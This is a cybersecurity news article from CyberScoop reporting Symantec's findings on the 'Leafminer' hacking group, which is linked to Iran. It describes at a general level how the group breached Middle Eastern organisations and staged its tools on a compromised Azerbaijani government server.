Newly uncovered ‘Leafminer’ hacking group hitting wide array of Middle Eastern targets

The newly uncovered group uses a mix of custom and publicly available malware tools to breach targets in order to steal data.
A picture of Riyadh, Saudi Arabia. The country was one of many attacked by Leafminer. (Getty/PhotoMosh)

A newly uncovered hacking group has breached a number of critical infrastructure and government organizations in the Middle East with a mixture of publicly available and custom-built tools, according to new research from cybersecurity giant Symantec.

Dubbed Leafminer by the company, the group has infiltrated a number of organizations in countries such as Azerbaijan, Israel, Lebanon and Saudi Arabia, with a variety of intrusion techniques. Researchers observed the group using watering hole websites, vulnerability scans and brute-force login attempts for the purposes of data theft.

Symantec researchers categorized the group as “highly active,” conducting various operations since early 2017. The group targeted a wide range of sectors, including energy, government, finance and telecommunications.

According to Vikram Thakur, Symantec’s technical director, the group was active up until publication of the company’s research.


“Their servers are very much still up,” Thakur told CyberScoop.

The group is particularly adept at honing its skills based on various research reports and presentations that have been made public on the internet. It also leverages EternalBlue, the exploit that takes advantage of flaws in Microsoft’s Server Message Block protocol. That exploit was made available in the Shadow Brokers leak, which gave the public access to a massive library of hacking tools used by the National Security Agency.

Symantec’s blog post links Leafminer to actors based in Iran. However, Thakur told CyberScoop that researchers have no other evidence of the group’s motive or if it is working on behalf of the government.

“We have no idea if they are doing this on their own accord or at the behest of somebody else,” he said.

Ambitious, But Brazen


In the course of the investigation, Symantec researchers found a download URL for a malware payload used in one of the attacks. That URL lead to a compromised web server hosted on an Azerbaijani government website. The group has been using that server to distribute malware, payloads, and tools among its members.

“Clearly the attackers have compromised that server and have been using it as their staging server,” Thakur told CyberScoop.

Since that discovery, Symantec researchers have been examining Leafminer’s tools as the attackers have swapped different files from the server.

“I don’t think Leafminer thought about anyone else having public access,” Thakur said. “That’s the reason that every time they upload files, we’re able to go to the website, look at their web shells, take the files and examine them ourselves.”

Given the ease by which Symantec researchers came across the tools, Thakur wouldn’t rule out the possibility that Leafminer has hidden other staging servers. However, his team has yet to uncover any such setup.


Living off the Land

Researchers chronicle in the blog post how Leafminer has mixed publicly available tools, tactics and procedures to boost its own custom malware.

One such instance is OrangeTeghal, a knockoff of the widespread post-exploitation tool Mimikatz. Leafminer reworked Mimikatz’s underlying code to copy a technique revealed in a presentation given at the 2017 Black Hat Europe cybersecurity conference. The code allowed the group to avoid detection from tools that would have recognized the Mimikatz code.

Additionally, the group used a watering hole technique that stole SMB credential hashes via JavaScript. This technique was similar to one used by Dragonfly, a well-resourced hacking group with ties to Russia that has targeted U.S. and European energy companies in a campaign stretching back to 2015.

Once inside the victim’s systems, the group used EternalBlue to move laterally between target networks and compromised staging servers.


Thakur told CyberScoop this mix of using custom and publicly available toolsets — a practice the company refers to as “living off the land” — is a growing trend among hacking groups.

“There are very few attacking groups that continue to use custom malware exclusively,” he told CyberScoop. “The advantages of using publicly available tools not only helps the attackers in flying under the radar, but also it prevents the security industry and government agencies from attribution.”

Still Online?

While Thakur says the group is still active, he expects that within a day or two, the compromised staging servers run by various victims will be fixed. Those fixes would mean Leafminder would lose those various toolsets.

Even with those remediation efforts, Thakur expects the group to stay active.


“The next step for us to watch to see if Leafminer goes outside of these countries and attack outside of these verticals,” he said. “We expect these attacks to continue.”

Greg Otto

Written by Greg Otto

Greg Otto is Editor-in-Chief of CyberScoop, overseeing all editorial content for the website. Greg has led cybersecurity coverage that has won various awards, including accolades from the Society of Professional Journalists and the American Society of Business Publication Editors. Prior to joining Scoop News Group, Greg worked for the Washington Business Journal, U.S. News & World Report and WTOP Radio. He has a degree in broadcast journalism from Temple University.

Latest Podcasts